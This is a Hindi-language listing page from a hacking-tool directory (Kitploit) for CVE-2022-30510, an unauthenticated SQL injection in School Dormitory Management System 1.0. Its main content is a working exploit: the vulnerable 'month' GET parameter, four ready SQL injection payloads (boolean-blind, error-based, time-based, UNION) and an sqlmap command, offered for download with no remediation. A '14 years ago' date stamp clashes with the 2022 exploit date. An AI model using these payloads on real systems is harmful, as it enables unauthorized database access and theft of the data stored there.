Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-30510 — School Dormitory Management System 1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन | Kitploit
उपकरण/GitHubGitHub/bigzooooz/cve-2022-30510
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubbigzooooz/cve-2022-30510

CVE-2022-30510

School Dormitory Management System 1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन

रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-30510

School Dormitory Management System 1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन

एक्सप्लॉइट शीर्षक: School Dormitory Management System 1.0 - बिना प्रमाणीकरण के SQL इंजेक्शन

दिनांक: 2022-05-25

CVE: CVE-2022-30510

एक्सप्लॉइट लेखक: Abdulaziz Saad (@b4zb0z)

विक्रेता होमपेज: https://www.sourcecodester.com/

सॉफ़्टवेयर लिंक:

https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

संस्करण: 1.0

परीक्षण किया गया: LAMP, Ubuntu


[#] भेद्यता स्थान: $_GET['month'] /dms/admin/reports/daily_collection_report.php:59 में

पैरामीटर: month (GET) प्रकार: boolean-based blind शीर्षक: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause पेलोड: page=reports/daily_collection_report&month=2022-05' RLIKE (SELECT (CASE WHEN (2158=2158) THEN 0x323032322d3035 ELSE 0x28 END))-- UWOA

प्रकार: error-based शीर्षक: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) पेलोड: page=reports/daily_collection_report&month=2022-05' AND (SELECT 1645 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1645=1645,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UlyZ

प्रकार: time-based blind शीर्षक: MySQL >= 5.0.12 AND time-based blind (query SLEEP) पेलोड: page=reports/daily_collection_report&month=2022-05' AND (SELECT 3409 FROM (SELECT(SLEEP(5)))uaoG)-- rTvo

प्रकार: UNION query शीर्षक: MySQL UNION query (NULL) - 11 columns पेलोड: page=reports/daily_collection_report&month=2022-05' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x46716d4777627770436a6b56566f764c4d6f5a6b476b615041477742414f6979424e4f51744a5563,0x71766b7a71),NULL,NULL#


[#] SQLMAP का उपयोग करके शोषण: sqlmap -u "http://localhost/dms/admin/?page=reports/daily_collection_report&month=2022-05" --dbms=mysql

टूल डाउनलोड करें